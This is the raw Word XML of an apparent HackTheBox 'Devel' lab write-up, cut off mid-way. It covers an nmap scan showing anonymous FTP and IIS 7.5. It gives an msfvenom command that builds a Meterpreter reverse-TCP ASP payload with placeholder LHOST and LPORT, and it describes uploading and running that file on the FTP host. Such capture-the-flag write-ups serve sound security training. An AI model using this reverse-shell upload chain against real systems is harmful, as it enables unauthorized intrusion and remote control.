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CC1703" w14:textId="271F7EE7" w:rsidR="00332ADA" w:rsidRDefault="00632E4B" w:rsidP="00632E4B">
      <w:pPr>
        <w:jc w:val="center"/>
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00632E4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>HackTheBox</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="00632E4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="00632E4B">
        <w:rPr>
          <w:b/>
          <w:bCs/>
        </w:rPr>
        <w:t>Devel</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="7E543A62" w14:textId="30A13DFB" w:rsidR="00632E4B" w:rsidRDefault="00632E4B" w:rsidP="00632E4B">
      <w:r>
        <w:t>Session 10.10.10.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="34D39B87" w14:textId="5F8C8DD7" w:rsidR="00632E4B" w:rsidRDefault="00632E4B" w:rsidP="00632E4B">
      <w:r>
        <w:t>Running enumeration scan:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2E2A4853" w14:textId="49751C91" w:rsidR="00632E4B" w:rsidRDefault="00632E4B" w:rsidP="00632E4B">
      <w:r>
        <w:t>Nmap -T4 -p- -A 10.10.10.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2CD5BDBE" w14:textId="276A2033" w:rsidR="00632E4B" w:rsidRDefault="00632E4B" w:rsidP="00632E4B">
      <w:r>
        <w:t xml:space="preserve">Pasting below the results from </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>nmap</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> scan: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="122ABD76" w14:textId="77777777" w:rsidR="00632E4B" w:rsidRDefault="00632E4B" w:rsidP="00632E4B">
      <w:r>
        <w:t xml:space="preserve">Starting Nmap 7.70 </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>( https://nmap.org</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> ) at 2020-11-09 17:36 EST</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="0CB30700" w14:textId="77777777" w:rsidR="00632E4B" w:rsidRDefault="00632E4B" w:rsidP="00632E4B">
      <w:r>
        <w:t>Nmap scan report for 10.10.10.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B204824" w14:textId="77777777" w:rsidR="00632E4B" w:rsidRDefault="00632E4B" w:rsidP="00632E4B">
      <w:r>
        <w:t>Host is up (0.10s latency).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="307C6F4F" w14:textId="77777777" w:rsidR="00632E4B" w:rsidRDefault="00632E4B" w:rsidP="00632E4B">
      <w:r>
        <w:t>Not shown: 65533 filtered ports</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="30C7088F" w14:textId="77777777" w:rsidR="00632E4B" w:rsidRDefault="00632E4B" w:rsidP="00632E4B">
      <w:r>
        <w:t>PORT   STATE SERVICE VERSION</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="5EA02E23" w14:textId="77777777" w:rsidR="00632E4B" w:rsidRDefault="00632E4B" w:rsidP="00632E4B">
      <w:r>
        <w:t>21/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>open  ftp</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">     Microsoft </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ftpd</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="4216ECE6" w14:textId="77777777" w:rsidR="00632E4B" w:rsidRDefault="00632E4B" w:rsidP="00632E4B">
      <w:r>
        <w:t>| ftp-anon: Anonymous FTP login allowed (FTP code 230)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="048B1AE2" w14:textId="77777777" w:rsidR="00632E4B" w:rsidRDefault="00632E4B" w:rsidP="00632E4B">
      <w:r>
        <w:t>| 03-18-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>17  01:06</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">AM       &lt;DIR&gt;          </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aspnet_client</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="67931615" w14:textId="77777777" w:rsidR="00632E4B" w:rsidRDefault="00632E4B" w:rsidP="00632E4B">
      <w:r>
        <w:t>| 03-17-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>17  04:37</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>PM                  689 iisstart.htm</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="10C3167F" w14:textId="77777777" w:rsidR="00632E4B" w:rsidRDefault="00632E4B" w:rsidP="00632E4B">
      <w:r>
        <w:t>|_03-17-</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>17  04:37</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>PM               184946 welcome.png</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2742CB13" w14:textId="77777777" w:rsidR="00632E4B" w:rsidRDefault="00632E4B" w:rsidP="00632E4B">
      <w:r>
        <w:t xml:space="preserve">| ftp-syst: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="48754F93" w14:textId="77777777" w:rsidR="00632E4B" w:rsidRDefault="00632E4B" w:rsidP="00632E4B">
      <w:r>
        <w:t>|</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>_  SYST</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>Windows_NT</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="577A92AB" w14:textId="77777777" w:rsidR="00632E4B" w:rsidRDefault="00632E4B" w:rsidP="00632E4B">
      <w:r>
        <w:t>80/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>open  http</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve">    Microsoft IIS httpd 7.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="145982EA" w14:textId="77777777" w:rsidR="00632E4B" w:rsidRDefault="00632E4B" w:rsidP="00632E4B">
      <w:r>
        <w:t xml:space="preserve">| http-methods: </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="490007D9" w14:textId="77777777" w:rsidR="00632E4B" w:rsidRDefault="00632E4B" w:rsidP="00632E4B">
      <w:r>
        <w:t>|</w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>_  Potentially</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t xml:space="preserve"> risky methods: TRACE</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2139FC8E" w14:textId="77777777" w:rsidR="00632E4B" w:rsidRDefault="00632E4B" w:rsidP="00632E4B">
      <w:r>
        <w:t>|_http-server-header: Microsoft-IIS/7.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="489A9C91" w14:textId="77777777" w:rsidR="00632E4B" w:rsidRDefault="00632E4B" w:rsidP="00632E4B">
      <w:r>
        <w:t>|_http-title: IIS7</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6E753D5E" w14:textId="77777777" w:rsidR="00632E4B" w:rsidRDefault="00632E4B" w:rsidP="00632E4B">
      <w:r>
        <w:t xml:space="preserve">Warning: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>OSScan</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> results may be unreliable because we could not find at least 1 open and 1 closed port</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="22C01F0F" w14:textId="77777777" w:rsidR="00632E4B" w:rsidRDefault="00632E4B" w:rsidP="00632E4B">
      <w:r>
        <w:t xml:space="preserve">Device type: general </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>purpose|phone|specialized</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="3F74491B" w14:textId="77777777" w:rsidR="00632E4B" w:rsidRDefault="00632E4B" w:rsidP="00632E4B">
      <w:r>
        <w:t>Running (JUST GUESSING): Microsoft Windows 2008|7|Vista|Phone|8.1|2012 (91%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6B2575A9" w14:textId="77777777" w:rsidR="00632E4B" w:rsidRDefault="00632E4B" w:rsidP="00632E4B">
      <w:r>
        <w:t xml:space="preserve">OS CPE: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cpe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">:/o:microsoft:windows_server_2008:r2 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cpe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">:/o:microsoft:windows_8 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cpe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">:/o:microsoft:windows_7 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cpe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>o:microsoft:windows_vista</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">::- </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cpe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>o:microsoft:windows_vista</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">::sp1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cpe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>o:microsoft:windows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cpe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve">:/o:microsoft:windows_8.1 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>cpe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:/o:microsoft:windows_server_2012</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="171FC0F8" w14:textId="77777777" w:rsidR="00632E4B" w:rsidRDefault="00632E4B" w:rsidP="00632E4B">
      <w:r>
        <w:t xml:space="preserve">Aggressive OS guesses: Microsoft Windows Server 2008 R2 (91%), Microsoft Windows Server 2008 R2 SP1 or Windows 8 (91%), Microsoft Windows 7 (91%), Microsoft Windows 7 Professional or Windows 8 </w:t>
      </w:r>
      <w:r>
        <w:lastRenderedPageBreak/>
        <w:t>(91%), Microsoft Windows Vista SP0 or SP1, Windows Server 2008 SP1, or Windows 7 (91%), Microsoft Windows Vista SP2 (91%), Microsoft Windows Vista SP2, Windows 7 SP1, or Windows Server 2008 (90%), Microsoft Windows 8.1 Update 1 (90%), Microsoft Windows Phone 7.5 or 8.0 (90%), Microsoft Windows 7 or Windows Server 2008 R2 (90%)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="383AA537" w14:textId="77777777" w:rsidR="00632E4B" w:rsidRDefault="00632E4B" w:rsidP="00632E4B">
      <w:r>
        <w:t>No exact OS matches for host (test conditions non-ideal).</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3CE0EE85" w14:textId="77777777" w:rsidR="00632E4B" w:rsidRDefault="00632E4B" w:rsidP="00632E4B">
      <w:r>
        <w:t>Network Distance: 2 hops</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1C2B3F5B" w14:textId="77777777" w:rsidR="00632E4B" w:rsidRDefault="00632E4B" w:rsidP="00632E4B">
      <w:r>
        <w:t xml:space="preserve">Service Info: OS: Windows; CPE: </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>cpe</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>:/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>o:microsoft</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
      <w:r>
        <w:t>:windows</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
    </w:p>
    <w:p w14:paraId="422A5422" w14:textId="77777777" w:rsidR="00632E4B" w:rsidRDefault="00632E4B" w:rsidP="00632E4B"/>
    <w:p w14:paraId="6CEA8087" w14:textId="77777777" w:rsidR="00632E4B" w:rsidRDefault="00632E4B" w:rsidP="00632E4B">
      <w:r>
        <w:t>TRACEROUTE (using port 21/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t>)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7B51B59F" w14:textId="77777777" w:rsidR="00632E4B" w:rsidRDefault="00632E4B" w:rsidP="00632E4B">
      <w:r>
        <w:t>HOP RTT       ADDRESS</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="08B19B43" w14:textId="77777777" w:rsidR="00632E4B" w:rsidRDefault="00632E4B" w:rsidP="00632E4B">
      <w:r>
        <w:t xml:space="preserve">1   102.65 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 10.10.14.1</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="209E0E9E" w14:textId="77777777" w:rsidR="00632E4B" w:rsidRDefault="00632E4B" w:rsidP="00632E4B">
      <w:r>
        <w:t xml:space="preserve">2   102.74 </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>ms</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> 10.10.10.5</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="6AA37C7E" w14:textId="77777777" w:rsidR="00632E4B" w:rsidRDefault="00632E4B" w:rsidP="00632E4B"/>
    <w:p w14:paraId="1CEBD75A" w14:textId="77777777" w:rsidR="00632E4B" w:rsidRDefault="00632E4B" w:rsidP="00632E4B">
      <w:r>
        <w:t xml:space="preserve">OS and Service detection performed. Please report any incorrect results at </w:t>
      </w:r>
      <w:proofErr w:type="gramStart"/>
      <w:r>
        <w:t>https://nmap.org/submit/ .</w:t>
      </w:r>
      <w:proofErr w:type="gramEnd"/>
    </w:p>
    <w:p w14:paraId="2D6202CB" w14:textId="12390D30" w:rsidR="00632E4B" w:rsidRDefault="00632E4B" w:rsidP="00632E4B">
      <w:r>
        <w:t>Nmap done: 1 IP address (1 host up) scanned in 138.07 seconds</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="4B8C306B" w14:textId="555105A6" w:rsidR="0088748F" w:rsidRDefault="0088748F" w:rsidP="00632E4B">
      <w:r>
        <w:t>Looking at the Vulnerability:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="1B182BF3" w14:textId="77777777" w:rsidR="0088748F" w:rsidRDefault="0088748F" w:rsidP="0088748F">
      <w:r>
        <w:t>| ftp-anon: Anonymous FTP login allowed (FTP code 230)</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7C4104AA" w14:textId="2F3A8A41" w:rsidR="0088748F" w:rsidRDefault="0088748F" w:rsidP="00632E4B">
      <w:r>
        <w:t>I then opened the terminal and went to:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="2B965FA6" w14:textId="2C29327F" w:rsidR="0088748F" w:rsidRDefault="0088748F" w:rsidP="00632E4B">
      <w:r w:rsidRPr="0088748F">
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="34660278" wp14:editId="1927EFDA">
            <wp:extent cx="5943600" cy="1158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03BC" w14:textId="2ED9CD71" w:rsidR="0088748F" w:rsidRDefault="0088748F" w:rsidP="00632E4B">
      <w:r>
        <w:t xml:space="preserve">This shows that the anonymous log in was successful for FTP </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="74AB2E55" w14:textId="2C011321" w:rsidR="0088748F" w:rsidRDefault="0088748F" w:rsidP="00632E4B">
      <w:r>
        <w:t xml:space="preserve">Now I know I can use a malicious exploit for the directory and reverse shell into it for root access </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="790229C1" w14:textId="32011AB1" w:rsidR="0088748F" w:rsidRDefault="0088748F" w:rsidP="00632E4B">
      <w:r>
        <w:t xml:space="preserve">Next, I looked up a </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> exploit for </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:t>aspx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="693C7431" w14:textId="321742E6" w:rsidR="0088748F" w:rsidRDefault="0088748F" w:rsidP="00632E4B">
      <w:r>
        <w:t>I found in google:</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="233D70EB" w14:textId="0721A8DD" w:rsidR="0088748F" w:rsidRDefault="0088748F" w:rsidP="0088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0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0088748F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="110000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>msfvenom</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0088748F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="110000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088748F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660033"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-p</w:t>
      </w:r>
      <w:r w:rsidRPr="0088748F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="110000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> windows</w:t>
      </w:r>
      <w:r w:rsidRPr="0088748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/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0088748F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="110000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>meterpreter</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0088748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/</w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r w:rsidRPr="0088748F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="110000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>reverse_tcp</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r w:rsidRPr="0088748F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="110000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088748F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="007800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LHOST</w:t>
      </w:r>
      <w:r w:rsidRPr="0088748F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="110000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="0088748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</w:t>
      </w:r>
      <w:r w:rsidRPr="0088748F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="110000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Your IP Address</w:t>
      </w:r>
      <w:r w:rsidRPr="0088748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  <w:r w:rsidRPr="0088748F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="110000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088748F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="007800"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>LPORT</w:t>
      </w:r>
      <w:r w:rsidRPr="0088748F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="110000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>=</w:t>
      </w:r>
      <w:r w:rsidRPr="0088748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&lt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0088748F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="110000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>Your Port to Connect On</w:t>
      </w:r>
      <w:r w:rsidRPr="0088748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  <w:r w:rsidRPr="0088748F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="110000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> </w:t>
      </w:r>
      <w:r w:rsidRPr="0088748F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="660033"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>-f</w:t>
      </w:r>
      <w:r w:rsidRPr="0088748F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="110000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> asp </w:t>
      </w:r>
      <w:r w:rsidRPr="0088748F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&gt;</w:t>
      </w:r>
      <w:r w:rsidRPr="0088748F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="110000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> shell.asp</w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="3157D052" w14:textId="10DFAFCF" w:rsidR="0088748F" w:rsidRDefault="0088748F" w:rsidP="0088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0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="70685FC1" w14:textId="5B068B2D" w:rsidR="0088748F" w:rsidRDefault="0088748F" w:rsidP="0088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0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0088748F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="110000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:lastRenderedPageBreak/>
        <w:drawing>
          <wp:inline distT="0" distB="0" distL="0" distR="0" wp14:anchorId="2DBBB82B" wp14:editId="38E5980A">
            <wp:extent cx="5943600" cy="6445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2B7F" w14:textId="4CF589E2" w:rsidR="0088748F" w:rsidRDefault="0088748F" w:rsidP="0088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0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
    </w:p>
    <w:p w14:paraId="02B78017" w14:textId="17DC6846" w:rsidR="0088748F" w:rsidRDefault="0088748F" w:rsidP="0088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0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="110000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve">I created an </w:t>
      </w:r>
      <w:proofErr w:type="spellStart"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="110000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t>ex.apsx</w:t>
      </w:r>
      <w:proofErr w:type="spellEnd"/>
      <w:r>
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="110000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:t xml:space="preserve"> file and ran it in the ftp host </w:t>
      </w:r>
    </w:p>
    <w:p w14:paraId="7D98FAA0" w14:textId="56FBC1AD" w:rsidR="0088748F" w:rsidRDefault="0088748F" w:rsidP="0088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0000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
      </w:pPr>
      <w:r w:rsidRPr="0088748F">
        <w:rPr>
          <w:rFonts w:ascii="Courier New" w:eastAsia="Times New Roman" w:hAnsi="Courier New" w:cs="Courier New"/>
          <w:color w:val="110000"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
        </w:rPr>
        <w:drawing>
